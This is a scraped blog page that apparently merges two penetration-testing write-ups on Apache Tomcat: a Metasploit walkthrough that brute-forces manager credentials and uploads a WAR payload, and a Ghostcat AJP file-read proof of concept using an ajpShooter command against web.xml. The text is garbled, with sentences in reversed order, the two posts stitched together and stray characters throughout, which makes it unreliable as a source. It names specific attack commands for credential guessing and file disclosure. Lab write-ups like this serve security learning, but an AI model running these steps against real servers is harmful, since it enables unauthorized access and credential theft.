![]() war archive and then it tries to execute the. Exploitation of Apache TomcatĪs you can the exploit is uploading the payload as a. We will use the port 8180 instead of 80 because this is the port that the Apache Tomcat is running.Also as you can see it is important to set any valid credentials that you have discovered. We can see from the above image that there is an option for username and an option for password to authenticate with the application in order to deliver the exploit.We already have valid credentials for this server from our previous scan so we will use them.The next image is showing how we have configured the exploit. The scanner have discovered valid credentials under the username tomcat and password tomcat.Now it is time to select the appropriate exploit in order to gain access to the remote target through the Apache Tomcat service.The metasploit framework has a specific module which can be used to execute a payload on Apache Tomcat servers that are running the manager application. Discovery Valid Credentials in Apache Tomcat We don’t have to give to give a path for a password list in this module because it is already configured to scan the password from a specific list of the metasploit wordlists.However if we have an appropriate wordlist,bigger than the existing one we can select our own.So we run the scanner and we are waiting to see if it will discover any valid credentials. We have found an auxiliary scanner which will be the tool for our attempt to login to the Tomcat Application Manager.So we are selecting the scanner by using the command use auxiliary/scanner/http/tomcat_mgr_login and then we are configuring it properly as it appears on the next screenshot. Our next step will be to open metasploit framework and to search for specific modules about the Apache Tomcat by using the command search Tomcat. Tomcat have since fixed the issue so the best way to protect yourselves is to update!Īny comments or questions please contact me on twitter at the link at the top of the page.Ĭopied from my old blog published 3 April 2020.In this article we will focus on the Apache Tomcat Web server and how we can discover the administrator’s credentials in order to gain access to the remote system.So we are performing our internal penetration testing and we have discovered the Apache Tomcat running on a remote system on port 8180. In this instance this results in the reading of the restricted file web.xml that results in the information leak of a password. Python3 ajpShooter.py 8009 /WEB-INF/web.xml read To look through what we have we can check all of these with our AJP shooter with the following command: WEB-INF(d)(web.xml, classes(d), lib(d)).The LFI affects the Webapp server so some googling presents the default folders present in this file structure. In the following example we have found a Tomcat web server and after an Nmap scan we have found port 8009 to be open. Rather than fighting with the AJP requests there is a simple tool that can be used to send the required data to exploit the LFI. POCįor the POC I am using ’s new room for the Ghostcat exploit. It affects all unpatched versions of Apache Tomcat. Where file uploads are allowed this can also lead to remote code execution (Assuming the documents are stored in the document root). This means it can be exploited to read restricted web app files on the appserver. GhostCat is a local file inclusion (LFI) vulnerability present through the exploitation of the Apache Jserv Protocol. ![]() By default this runs on port 8009 so if you see that on a Nmap scan you know what to look for. Communication with the servlet is conducted by TCP and once a connection is assigned to a particular request, it will not be used for any others until the request-handling cycle has been terminated. This of course means that it should never be exposed to the internet. To make matters worse within the system it has a lot of built in trust. Apache Jserv Protocol (AJP)ĪJP is a protocol that can proxy inbound requests through the web server into the application server behind it. A quick search with searchsploit or on ExploitDB reveals a list of potential weaknesses if the latest version is not installed. During its time it has seen its fair share of vulnerabilities. Tomcat is an Open Source Apache web server written in Java. I will start with a few definitions and then move on to the POC and remediations. Probably old news to most but wanted to get my learning down on “paper” to help me organise my thoughts. To continue my theme of better late than never I have a quick write up of the ghost cat vulnerability.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |